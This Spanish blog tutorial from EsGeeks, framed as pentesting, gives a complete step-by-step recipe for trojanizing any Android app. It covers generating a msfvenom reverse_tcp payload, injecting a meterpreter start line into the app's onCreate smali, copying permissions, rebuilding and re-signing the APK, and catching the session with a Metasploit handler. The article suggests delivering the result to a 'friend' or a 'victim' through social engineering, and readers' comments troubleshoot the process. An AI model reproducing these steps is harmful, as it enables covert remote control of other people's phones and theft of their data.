EsGeeks Logo Movil
Logo EsGeeks
  • Seguridad
    Seguridad

    La seguridad informática o ciberseguridad es un tema indispensable en el mundo tecnológico de hoy. Y aquí en esGeeks conocerás los mejores tips, trucos y consejos para mantener tu privacidad e integridad invulnerable.

    Quédate aquí para sacar el máximo provecho de los temas actuales sobre seguridad informática.

    Sub404 Herramienta para Comprobar la Vulnerabilidad de Subdomain Takeover

    Sub404: Herramienta para Comprobar la Vulnerabilidad de Subdomain Takeover

    Pruebas de Seguridad de Aplicaciones Web

    Pruebas de Seguridad de Aplicaciones Web: Entender los Tipos, Propósito e Importancia

    Afrog Una Herramienta para Encontrar Vulnerabilidades

    Afrog: Una Herramienta para Encontrar Vulnerabilidades

  • Hacking
    Hacking

    Los profesionales de la seguridad saben que el hacking ético, también conocido como pruebas de penetración, es una habilidad vital. Consiste en analizar las aplicaciones web y las redes para descubrir vulnerabilidades que los hackers podrían explotar.

    Ser capaz de reconocer dichas vulnerabilidades en el software que utilizamos a diario puede ser una cuestión de vida o muerte. Aquí te compartimos nuestro mejor contenido.

    Iniciarse en la Seguridad Informática y Hacking Ético

    ¿Cómo Iniciarse en la Seguridad Informática y Hacking Ético?

    MSDAT Herramienta Pentesting a Bases de Datos Microsoft SQL

    MSDAT: Herramienta Pentesting a Bases de Datos Microsoft SQL

    Limitaciones de las Pruebas de Penetración que debes Conocer

    7 Limitaciones de las Pruebas de Penetración que debes Conocer

  • Linux
    Linux

    En esta sección de Linux aprenderás lo necesario para sacarle el máximo provecho al SO de software libre. Con tutoriales y pantallas paso a paso, no necesitarás ser un experto ni mucho menos usar a diario Linux.

    No necesitas tenerlo instalado como sistema primario, puedes usarlo compartido con Windows o instalar una máquina virtual. Paso a paso y poco a poco aprenderás a amar Linux y escoger tu distribución de Linux favorita.

    ZapZap WebApp no oficial de WhatsApp Web para Linux

    ZapZap: WebApp no oficial de WhatsApp Web para Linux

    Operadores para Concatenar Comandos en Linux

    10 Útiles Operadores para Concatenar Comandos en Linux

    Buscar Rootkits en Linux con RkHunter y Chkrootkit

    Buscar Rootkits en Linux con RkHunter y Chkrootkit

  • Windows
    Windows

    Trucos, tips, consejos y tutoriales para sacar el máximo provecho al sistema operativo Windows. Windows 7, Windows 8, Windows 8.1 y Windows 10.

    Quédate aquí y disfruta de gran cantidad de trucos para hacer las cosas más fáciles, asombrosas y muchas utilidades que son posibles en el sistema operativo de Microsoft.

    Tenorshare 4DDiG Software de Recuperación de Datos

    TENORSHARE 4DDIG: El Mejor Software de Recuperación de Datos en Windows

    Reseña de WonderFox DVD Ripper Pro para Backup de DVDs Dañados

    Reseña WonderFox DVD Ripper Pro: Backup DVDs Dañados a Archivos Digitales

    Eliminar Archivos que no se puedan Recuperar en Windows

    Cómo Eliminar Archivos de forma que no se puedan Recuperar [Windows]

  • Android
    Android

    Trucos, tips y consejos para sacar el máximo provecho a tu Android. Pantallasos y tutoriales paso a paso de cómo hacer las cosas fáciles en Android.

    Hacer root a tu smartphone, aplicaciones, juegos, emuladores, hacks y mucho más encontrarás en esGeeks!

    Posible Espiar un Teléfono sin tocarlo ni Instalar Programas

    ¿Es Posible Espiar un Teléfono sin tocarlo ni Instalar Programas?

    Buscador de Móviles para Comparar Características

    El Buscador de Móviles que te Permite Comparar Características

    Monitorear una Cuenta de LINE con KidsGuard for Line

    Cómo Monitorear una Cuenta de LINE con KidsGuard for Line

  • Web
    Web

    En Web te proporcionamos las mejores páginas, herramientas y utilidades para aprovecharlas día a día. Descargas, ofertas de trabajos, contenido viral y mucho más encontrarás en esGeeks!

    Déjate sorprender por nosotros sorprende a los demás. Lo más destacado de la Web e Internet lo encontrarás aquí, en esGeeks!

    Secretos y Trucos de las Apuestas Deportivas

    7 Secretos y Trucos de las Apuestas Deportivas

    Descargar Minecraft 1.20

    Descargar Minecraft 1.20.10, 1.20.20 y 1.20

    Cómo Crear un Favicon para el Sitio Web

    Cómo Crear un Favicon para el Sitio

  • Contacto
  • Cursos
    • Ofertas
    • Cursos
  • 0
Leyendo
Pentesting con Meterpreter en Cualquier Android APK
CompartirTweet
Hacking cualquier Android con Meterpreter en APK
Hacking cualquier Android con Meterpreter en APK
Hacking
·9 Minutos de lectura

Pentesting con Meterpreter en Cualquier Android APK

Este es otro artículo de cómo podríamos llegar a realizar pentesting a un sistema Android (comprometer dispositivo Android) y obtener una sesión de meterpreter mediante una .apk infectada.

En este tutorial vamos modificar un APK (cualquier aplicación o juego Android) añadiéndole un payload de Metasploit (msf) y posteriormente tener una sesión meterpreter.

1. Introducción al malware en smartphones

El móvil está en todas partes estos días. En cuanto al malware, nuestros amigos de Apple siguen manteniendo el paradigma de intentar examinar todas las aplicaciones que entran en la tienda de aplicaciones de iOS. Aunque se trata de un esfuerzo noble, todavía hay casos en los que el malware se cuela por la puerta.

A diferencia de Apple, el mercado de Android es un enfoque abierto que permite a cualquier persona contribuir a la Play Store y, además, representa la mayor parte de la participación del mercado móvil. Además, hay varios sitios de terceros que permiten la descarga directa de archivos de paquetes de aplicaciones Android (APK).

2. Metasploit y Android

El proyecto Metasploit le permite a un pentester generar cargas útiles (de ahora en adelante ‘payloads’) de Android con un canal de comando meterpreter altamente funcional que se puede cargar en un dispositivo Android. Normalmente, la carga de este APK se realizará a través del depurador de Android “adb“.

Desde la perspectiva de un pen tester, algo divertido de hacer es combinar una aplicación legítima con Meterpreter, y cargarla en un dispositivo Android. Naturalmente, podríamos considerar enviar ese ‘malware‘ a un “amigo” como un regalo o hacerlo mediante ingeniería social.

3. Hacking Android con Metasploit

Las aplicaciones de Android están escritas en Java, que se compilan en un formato ejecutable de Dalvik conocido como DEX. La versión compilada de una aplicación es un archivo ZIP de archivos de bytecode DEX. La máquina virtual Dalvik en Android se reemplazó más recientemente con Android RunTime (ART), que realiza una optimización adicional y compila el código de bytes DEX en un código de ensamblaje nativo.

Smali/baksmali es un ensamblador/desensamblador para el bytecode DEX de Android. Una herramienta de Android llamada “apktool” permite desensamblar DEX comprimidos (archivos APK) en archivos smali, y volver a ensamblar los archivos smali a DEX y, posteriormente, al formato APK comprimido. Podemos usar esta herramienta para desmontar y modificar un archivo APK existente. En este contexto, podemos usar la herramienta para desensamblar y agregar un punto de entrada estático adicional en el código smali del Activity inicial de Android para iniciar nuestro Meterpreter.

En general, los pasos para incrustar un Meterpreter en un archivo APK existente son los siguientes:

  1. Encontrar una aplicación APK de diversión en “apkmirror.com” o en un sitio mirror similar.
  2. Generar el archivo APK Metasploit.
  3. Desmontar con “apktool” el archivo APK Metasploit y el archivo APK que intentas modificar.
  4. Copiar todo el código de smali de Meterpreter en el nuevo directorio smali del APK.
  5. Encontrar el punto de entrada del código dentro del archivo AndroidManifest.xml de la aplicación APK buscando la línea: <action android:name="android.intent.action.MAIN"/>
  6. Modificar el archivo “.smali” del activity para incluir una línea que inicie la etapa del Meterpreter.
  7. Copiar todos los permisos de Meterpreter del AndroidManifest.xml en el AndroidManifest.xml del APK modificado.
  8. Re-ensamblar en formato comprimido DEX.
  9. Firmar el archivo APK recién creado con “jarsigner“, y luego cargar en el dispositivo Android de la víctima.

4. Ejemplo de Payload para Android

Es mucho más fácil entender los pasos anteriores con un ejemplo concreto.

Requisitos:

  • Kali Linux
  • Apktool (Integrada en Kali, pero si surge un problema, descarga aquí)

4.1. Descargar un APK legítimo

Para ilustrar esto, descarga un archivo APK de cualquier juego o aplicación en apkmonk.com, apkmirror.com o utilizando un APK downloader online para las últimas versiones.

En mi caso usaré de ejemplo nuestra app conocida: How to: Guía para Informáticos

Descargar cualquier APK de un sitio mirror
Descargar cualquier APK de un sitio mirror

4.2. Generar tu malware APK

Luego generaré un APK Metasploit usando el comando “msfvenom” de la siguiente manera:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[Tu_IP] LPORT=4444 -o msf.apk
Generar un APK malware con msfvenom
Generar un APK malware con msfvenom

4.3. Desmontar los archivos APK

Ambos archivos (APK ‘original’ y APK ‘malware’) se desmontaron usando “apktool” de la siguiente manera:

apktool d HowToGuiaparaInformaticos_v1.5.apk
apktool d msf.apk
Desmontar o desemsamblar archivos APK
Desmontar o desemsamblar archivos APK

4.4. Copiar el código de malware a la aplicación original

Una forma fácil de hacer esto es cambiar el directorio del Metasploit APK y luego copiar todos los archivos bajo el directorio “smali” en el directorio, para mi caso de ejemplo, HowToGuiaparaInformaticos_v1.5

Un viejo truco que aprendí de un administrador de sistemas para hacer una copia de seguridad de árboles de directorios completos es usar el comando “tar”, ¿cómo así? pues puedes canalizar la salida de tar en un segundo comando que cambia de directorio y “untars” los archivos resultantes.

  • Antes de mostrarte el comando, este artículo sobre TAR te puede interesar: +20 Comandos TAR para comprimir y extraer archivos en Linux
//Primero ubícate en el directorio de msf
cd msf/
tar -cf - ./smali | (cd ../[CarpetaArchivoOriginal]; tar -xpf - )
Combinar archivo malware en APK
Combinar archivo malware en APK

4.5. Encontrar la Actividad EntryPoint

A continuación podemos ver que la actividad de la entrada aparece como “com.esgeeks.howto_informaticos.ui.activity.IntroActivity“. Lo sabemos porque el XML contiene un filtro con “android.intent.action.MAIN” dentro de él.

grep -B2 "MAIN" AndroidManifest.xml
Encontrar Actividad EntryPoint en Android
Encontrar Actividad Principal en Android

4.6. Modificar el archivo smali del EntryPoint

Como se puede ver arriba, en este caso, el archivo se llama “IntroActivity.smali” (generalmente suelen llamarse “MainActivity.smali”, así que dependerá de la aplicación) y se ubicará en el directorio “com.esgeeks.howto_informaticos.ui.activity” según los puntos (“.”) En la ruta de clase completamente calificada.

Ubicación del archivo de la actividad EntryPoint
Ubicación del archivo de la actividad EntryPoint

Dentro del archivo “IntroActivity.smali“, buscamos el método “onCreate()“.

Necesitamos agregar una sola línea de código justo debajo de la llamada al método “onCreate()” para invocar nuestra etapa Meterpreter.

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Ten en cuenta que lo anterior es una sola línea de código. El resultado final después de la modificación se verá como la siguiente captura de pantalla.

Agregar código en onCreate() para Meterpreter
Agregar código en onCreate() para Meterpreter

4.7. Agregar permisos al archivo APK modificado “AndroidManifest.xml”

Para el siguiente paso, usa grep para buscar todas las líneas en el archivo “AndroidManfest.xml” del Metasploit (msf.apk) que contienen los strings “uses-permission” y “uses-feature” y luego copiarlas.

cat AndroidManifest.xml | grep "uses-permission"
Strings de uses-permission en Android
Strings de uses-permission en Android

Deberás usar un editor para insertar los permisos en el lugar adecuado en el nuevo archivo “AndroidManifest.xml” (del APK modificado). Busca una línea “uses-permission” existente como tu guía de dónde insertar el texto.

Añadir uses-permission al archivo malware
Añadir uses-permission al archivo malware

Nota

Podría terminar con algunos permisos duplicados. Opcionalmente puedes eliminarlos pero realmente no importa.

Ver también
Bxss una herramienta Inyección Blind XSS
Hacking

Bxss: Una Herramienta de Inyección Blind XSS

Alexynior·

4.8. Construir el nuevo archivo de paquete APK

Ahora usa “apktool” de nuevo para volver a ensamblar el archivo resultante del paquete APK. El resultado final se escribirá en un directorio “dist” dentro del propio directorio del APK.

apktool b HowToGuiaparaInformaticos_v1.5
Construir nuevo archivo de paquete APK
Construir nuevo archivo de paquete APK

Si te presenta un error, al igual que me pasó a mi. Agrega este comando y vuelve a ejecutar el anterior:

apktool empty-framework-dir --force

4.9. Vuelva a firmar el archivo del paquete resultante

Un método sencillo es utilizar la “keytool” de Java para generar tu propio repositorio de claves autofirmado y luego firmarlo con la herramienta “jarsigner” como se muestra en las capturas de pantalla a continuación.

keytool -genkey -v -keystore howto.keystore -alias howto -keyalg RSA -keysize 2048 -validity 10000
Claves de autofirmado con keytool
Claves de autofirmado con keytool
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore howto.keystore 
Firmar APK con jarsigner
Firmar APK con jarsigner

Finalmente, el archivo “HowToGuiaparaInformaticos_v1.5.apk” está listo para ser enviado e instalado en un dispositivo Android víctima.

4.10. Obtener una sesión de meterpreter

El paso final es, por supuesto, probar nuestra aplicación recién infectada.

Enviar APK de metasploit a víctima
Enviar APK de metasploit a víctima
Hackear Android con payload en APK

Descubrí entonces que, en el momento en que inicié la app, se obtiene un shell Meterpreter en el sistema KALI. Antes que nada, ejecutamos lo siguiente:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST "[tu_IP]"
set LPORT "4444"
exploit
Sesión de meterpreter para Android
Sesión de meterpreter para Android

¡Ahora sí! Tenemos acceso remoto al dispositivo Android:

Acceso remoto a dispositivo Android
Acceso remoto a dispositivo Android

5. Conclusión

Tantos pasos complicados … puede salir mal …

Así que después de realizar todos los pasos requeridos anteriormente, me pregunté si había algo más fácil. Hay tantas partes móviles que las posibilidades de error son bastante altas. Es probable que haya otras herramientas disponibles para usar, pero decidí hacer este tutorial explicando un poco a detalle.

En mi búsqueda de encontrar algo más sencillo, me encontré con un script de Python para automatizar este proceso. La herramienta se llama AndroidEmbedIT y esta es definitivamente lo más sencillo para obtener algo sin mucho esfuerzo.

Nota

Para usar android_embedit.py solo debes proporcionar un archivo APK generado por Metasploit, un APK original para modificar y un keystore, realizará todos los pasos de forma automática y generará el resultado final para ti

A continuación se muestra un ejemplo de uso. Todos los archivos temporales y la salida final del APK se almacenarán en el directorio “~/.ae”.

python android_embedit.py -kp howto -kn howto -ks howto.keystore [APK_original] msf.apk
AndroidEmbedIT para hacking de Android
AndroidEmbedIT para hacking de Android

¡Usa esta herramienta con cuidado y nos vemos en un próximo tutorial! Deja tus dudas en los comentarios y comparte este artículo ;’)

Etiquetas
AndroidPayloadsTrucos Hacking
0 6 0 1
CompartirTweetPinEnviarCompartir
Relacionado
Iniciarse en la Seguridad Informática y Hacking Ético

¿Cómo Iniciarse en la Seguridad Informática y Hacking Ético?

MSDAT Herramienta Pentesting a Bases de Datos Microsoft SQL

MSDAT: Herramienta Pentesting a Bases de Datos Microsoft SQL

29 Comentarios

  1. JuanBonilla dice:
    5 agosto, 2019 a las 5:10 am

    Disculpa, me sale un error al ejecutar cualquier comando, “operation failed 1”

    Alguna idea de a qué se deba? No me deja realizar nada, el único comando que funciona es el sysinfo

    Responder
    1. Alexynior dice:
      11 agosto, 2019 a las 7:09 am

      Hola que tal!

      En qué parte te aparece ese error?

      Responder
  2. carlos manuel dice:
    15 noviembre, 2019 a las 4:50 pm

    buenas, me sale el mismo error am momento de empaquetar y cuando pongo esta linea de codigo “apktool empty-framework-dir –force” no me funciona, de todos modos nome empaqueta!

    Responder
    1. Alexynior dice:
      15 noviembre, 2019 a las 5:04 pm

      Hola Carlos, estás utilizando la versión de apktool que se indica en el artículo?

      Responder
  3. Sebastian Rojas dice:
    30 diciembre, 2019 a las 6:55 pm

    Alexynior todo perfecto, solo en el momento de firmar con la herramienta jarsigner me aparece bash: jarsigner: orden no encontrada.
    se que jarsigner es parte de Java, utilizè el comando update -alternatives –config java para selecionar /usr/lib/jvm/java-11-openjdk-i386/bin/java 1111 modo automático y nada tampoco, no se a que se deba

    nota: aùn no e echo el apt get update y apt get upgrade ¿Serà eso?

    Responder
    1. Alexynior dice:
      1 enero, 2020 a las 5:14 pm

      Hola Sebastian,

      Tienes instalado Java JDK?

      Responder
  4. Adamouse dice:
    20 enero, 2020 a las 12:42 am

    Te agradecería enormemente si me ayudaras hablando por discord o por teamviewer, llevo 2 horas intentándolo y no hay manera.

    Al intentarlo con el tutirual completo funciona todo bien pero al abrir la APP deja de funcionar.
    Lo he intentado unas 10 veces con 3 aplicaciones diferentes y todas dejan de funcionar en todos los celulares en los que probé.

    Al hacerlo con el script automático sale esto:

    root@kali:~/Desktop/AndroidEmbedIT# python android_embedit.py -kp howto -kn howto -ks howto.keystore Spotify.apk msf.apk
    [*]===============================
    [*] Android EmbedIt Version 1.0
    [*] Author: Joff Thyer
    [*] Copyright (c) 2018
    [*]===============================

    [*] apktool decompiling [Spotify.apk]
    [*] apktool decompiling [msf.apk]
    [*] Main Activity is: com.spotify.music.MainActivity
    Traceback (most recent call last):
    File “android_embedit.py”, line 224, in
    ae.run()
    File “android_embedit.py”, line 33, in run
    self.modify_entrypoint(main)
    File “android_embedit.py”, line 90, in modify_entrypoint
    self.pdir1 = self.randstr()
    File “android_embedit.py”, line 41, in randstr
    return ”.join(random.choices(chset, k=length))
    AttributeError: ‘module’ object has no attribute ‘choices’

    Responder
    1. Alexynior dice:
      20 enero, 2020 a las 1:19 am

      Hola que tal!

      En aplicaciones populares no suele funcionar ya que tiene su código muy seguro. Deberás probar apps pasadas o sin actualizar en mucho tiempo. Lo siento :/

      Te dejo este script que hace el mismo procedimiento. Si ves la sección issues verás que hay usuarios que le suceden lo mismo…

      Responder
  5. Flyd dice:
    6 marzo, 2020 a las 4:40 pm

    buenas al momento de empaquetar me sale esto no se si es por la apk que no es compatible cosa que pieso que es redundante.

    I: Using Apktool 2.4.1
    I: Checking whether sources has changed…
    I: Smaling smali folder into classes.dex…
    Exception in thread “main” java.lang.OutOfMemoryError: Java heap space
    at org.jf.smali.smaliParser.nonvoid_type_descriptor(smaliParser.java:4551)
    at org.jf.smali.smaliParser.field_reference(smaliParser.java:7833)
    at org.jf.smali.smaliParser.insn_format22c_field(smaliParser.java:13029)
    at org.jf.smali.smaliParser.instruction(smaliParser.java:10807)
    at org.jf.smali.smaliParser.ordered_method_item(smaliParser.java:2027)
    at org.jf.smali.smaliParser.statements_and_directives(smaliParser.java:1747)
    at org.jf.smali.smaliParser.method(smaliParser.java:1543)
    at org.jf.smali.smaliParser.smali_file(smaliParser.java:621)
    at brut.androlib.mod.SmaliMod.assembleSmaliFile(SmaliMod.java:83)
    at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:74)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:59)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
    at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:418)
    at brut.androlib.Androlib.buildSources(Androlib.java:349)
    at brut.androlib.Androlib.build(Androlib.java:301)
    at brut.androlib.Androlib.build(Androlib.java:268)
    at brut.apktool.Main.cmdBuild(Main.java:251)
    at brut.apktool.Main.main(Main.java:79)
    espero una pronta respuesta

    Responder
    1. Alexynior dice:
      7 marzo, 2020 a las 5:05 pm

      Hola!

      Puedes intentar con la versión 2.3.3 de Apktool. Algunas versiones conllevan el mismo error :/

      Responder
  6. Edban Lopez dice:
    6 abril, 2020 a las 3:47 am

    Hola

    cuando estoy dentro de la sesion y pongo el comando ” ls ” , me aparece esta leyenda ” No entries exist in /data/user/0/com.metasploit.stage/files”

    depues pongo ” cd .. ” para navegar entre las carpetas pero al querer ver los contenidos con ” ls ” me aparece lo siguiente

    stdapi_fs_ls: Operation Failed : 1

    Responder
    1. Alexynior dice:
      12 abril, 2020 a las 4:48 pm

      Hola Edban 👋

      Al parecer la sesión no ha iniciado o se ha cerrado

      Responder
  7. Keops dice:
    11 abril, 2020 a las 9:05 pm

    En la parte de volver a montar el apk me da eel mismo error que has mencionado pero no lo soluciono poniendo “apktool empty-framework-dir –force” . Gracias

    Responder
    1. Alexynior dice:
      12 abril, 2020 a las 5:33 pm

      Hola 👋

      ¿Has intentado con un APK desconocido? Quiero decir, si lo intentas con apps conocidas, éstas son seguras y es posible que no funcione

      Responder
      1. Keops dice:
        13 abril, 2020 a las 11:03 am

        He probado con el mismo APK que tu, he seguido los mismos pasos que en el video. Cuando ejecuto el comando me poner esto “aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/linux/aapt_64 (defaulting to $PATH binary)”

        Responder
        1. Alexynior dice:
          17 abril, 2020 a las 3:12 am

          Hola, confirma que esté utilizando la versión Apktool 2.3.3 y no la Apktool 2.3.3-dirty

          Otra cosa que puedes hacer es limpiar:

          apktool empty-framework-dir

          Responder
          1. Keops dice:
            19 abril, 2020 a las 11:05 am

            Vale muchas gracias he resuelto ese error , pero en el ultimo paso a la hora de firmar el archivo me dice ‘comand not found” como lo puedo arreglar ? Gracias.

          2. Alexynior dice:
            21 abril, 2020 a las 9:14 pm

            Hola, qué comando ejecutas antes del error?

  8. Ale dice:
    24 abril, 2020 a las 4:15 am

    En la pare de jarsigner me pone
    bash: jarsigner: orden no encontrada

    Responder
    1. Alexynior dice:
      27 abril, 2020 a las 10:07 pm

      Asegúrate de tener instalado JDK 👋

      Responder
  9. Blacker dice:
    18 mayo, 2020 a las 3:55 am

    Hola, al momento de colocar ejecutar me aparece esto, estoy usando mi ip publica, ¿que solucion hay?

    Handler failed to bind to IP:4444:- –
    Started reverse TCP handler on 0.0.0.0:4444

    NOTA: Donde dice IP coloque mi ip publica, solo que no la coloco por cuestiones de seguridad

    Responder
    1. Alexynior dice:
      19 mayo, 2020 a las 6:26 pm

      Hola!

      El tutorial no está pensado para ataques fuera de la LAN. Habrá que hacer otras configuraciones extras…

      Responder
  10. pepe dice:
    15 noviembre, 2020 a las 11:10 am

    hola, como puedo saber si en mi dispositivo me instalaron el terminal? o me hicieron este procedimiento? si cambio mi ip al reconectarme a internet, el intruso sigue teniendo acceso a mi disposivito o me necesita reinstalar el archivo infectado? sospecho que me atacaron de esta manera aunque el celular en cuestion no lo uso hace unos años y ahora lo volvi a usar porque se rompio el anterior…gracias

    Responder
    1. Alexynior dice:
      15 noviembre, 2020 a las 12:46 pm

      Hola, a estas alturas Android debería limitar su uso en segundo en plano. Puedes verificar todos los procesos ejecutados o resintalar todas las apps desde las tiendas oficiales..

      Un saludo 👋

      Responder
  11. Eli dice:
    5 enero, 2021 a las 12:41 pm

    Hola

    realice todo como lo dice el tutorial, logre llegar al final sin errores,
    ahora al probar el apk no veo que se conecta con el metasploit, se queda en
    [*] Started reverse TCP handler on 10.0.2.15:4444
    y no se conecta con stage

    que puede estar ocurriendo?

    Responder
  12. kuro dice:
    14 octubre, 2021 a las 10:24 pm

    ─# -rw-r–r– 1 root root 6610 oct 14 20:40 UnityPlayerActivity.smali

    -rw-r–r–: command not found

    Responder
    1. Alexynior dice:
      15 octubre, 2021 a las 7:16 pm

      ¿Después de ejecutar cuál comando?

      Responder
  13. flyd dice:
    20 enero, 2022 a las 6:58 pm

    buenas al usar el comando

    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore howto.keystore

    me dice:

    A1 -keystore howto.keystore
    Please specify jarfile name

    Please type jarsigner –help for usage

    y no me deja mas

    Responder
    1. Alexynior dice:
      20 enero, 2022 a las 8:44 pm

      Hola, has realizado todos los pasos de la misma manera?
      Porque el comando es sólo un ejemplo

      Responder

Deja una respuesta Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

¡Estamos Aquí!

  • Like 22,996 Fans
  • Follow 11,089 Followers
  • Follow 1,085 Followers

Más Leídos

Iniciarse en la Seguridad Informática y Hacking Ético

¿Cómo Iniciarse en la Seguridad Informática y Hacking Ético?

MSDAT Herramienta Pentesting a Bases de Datos Microsoft SQL

MSDAT: Herramienta Pentesting a Bases de Datos Microsoft SQL

EsGeeks Logo
  • Suscribirme

Acerca de EsGeeks

Sitio web referente a Ethical Hacking y Seguridad Informática

Aplicaciones

  • Netflix Bajo Precio
  • Ofertas Software
  • ¿Cuál es Mi Dirección IP?
  • Generar Contraseña Segura
  • SMS Temporal
  • Email Temporal

Enlaces Útiles

  • Contacto
  • Política de Cookies
  • Política de Privacidad
  • Términos y Condiciones
  • Sorteos con EsGeeks
  • Imágenes by Depositphotos
© 2022 Todos los derechos reservados
EsGeeks Logo Movil
  • Suscribirme

Mi Carro Close (×)

0
Tu carrito está vacío
Ver tienda
Comience a escribir para ver resultados o presione Escape para cerrar
Trucos Linux Redes Seguridad Informática Trucos Seguridad Terminal Linux
Ver todos los resultados

SUSCRÍBETE

Recibe los Últimos Artículos de Seguridad y Hacking en tu Bandeja de Correo

He leído y acepto los términos y condiciones

Boletín de EsGeeks
Cookies Para que este sitio funcione adecuadamente, a veces instalamos en los dispositivos de los usuarios pequeños ficheros de datos, conocidos como cookies. La mayoría de los grandes sitios web también lo hacen.
Aceptar cookies
Leer más
Ajustes de cookies
Configuración de Cookie Box
Configuración de Cookie Box

Ajustes de privacidad

Decida qué cookies desea permitir.Puede cambiar estos ajustes en cualquier momento. Sin embargo, esto puede hacer que algunas funciones dejen de estar disponibles. Para obtener información sobre eliminar las cookies, por favor consulte la función de ayuda de su navegador.MÁS INFORMACIÓN SOBRE LAS COOKIES QUE USAMOS.

Con el deslizador, puede habilitar o deshabilitar los diferentes tipos de cookies:

  • Block all
  • Essential
  • Functionality
  • Analytics
  • Advertising

Este sitio web

  • Esencial: Recordar sus ajustes de permisos de cookies
  • Esencial: Permitir cookies de sesión
  • Esencial: Recopilar la información que introduzca en el formulario de contacto de un boletín informativo y otros formularios en todas las páginas
  • Esencial: Hacer un seguimiento de lo que introduzca en la cesta de la compra
  • Esencial: Verificar que ha iniciado sesión en su cuenta de usuario
  • Esencial: Recordar la versión del idioma seleccionado

Este sitio web no

  • Recordar los datos de inicio de sesión
  • Funcionalidad: Recordar los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados
  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas
  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web

  • Esencial: Recordar sus ajustes de permisos de cookies
  • Esencial: Permitir cookies de sesión
  • Esencial: Recopilar la información que introduzca en el formulario de contacto de un boletín informativo y otros formularios en todas las páginas
  • Esencial: Hacer un seguimiento de lo que introduzca en la cesta de la compra
  • Esencial: Verificar que ha iniciado sesión en su cuenta de usuario
  • Esencial: Recordar la versión del idioma seleccionado
  • Funcionalidad: Recordar todos los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados

Este sitio web no

  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas
  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web

  • Esencial: Recordar sus ajustes de permisos de cookies
  • Esencial: Permitir cookies de sesión
  • Esencial: Recopilar la información que introduzca en el formulario de contacto de un boletín informativo y otros formularios en todas las páginas
  • Esencial: Hacer un seguimiento de lo que introduzca en la cesta de la compra
  • Esencial: Verificar que ha iniciado sesión en su cuenta de usuario
  • Esencial: Recordar la versión del idioma seleccionado
  • Funcionalidad: Recordar todos los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados
  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas

Este sitio web no

  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web

  • Funcionalidad: Recordar los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados
  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas
  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web no

  • Recordar los datos de inicio de sesión
Guardar cerrar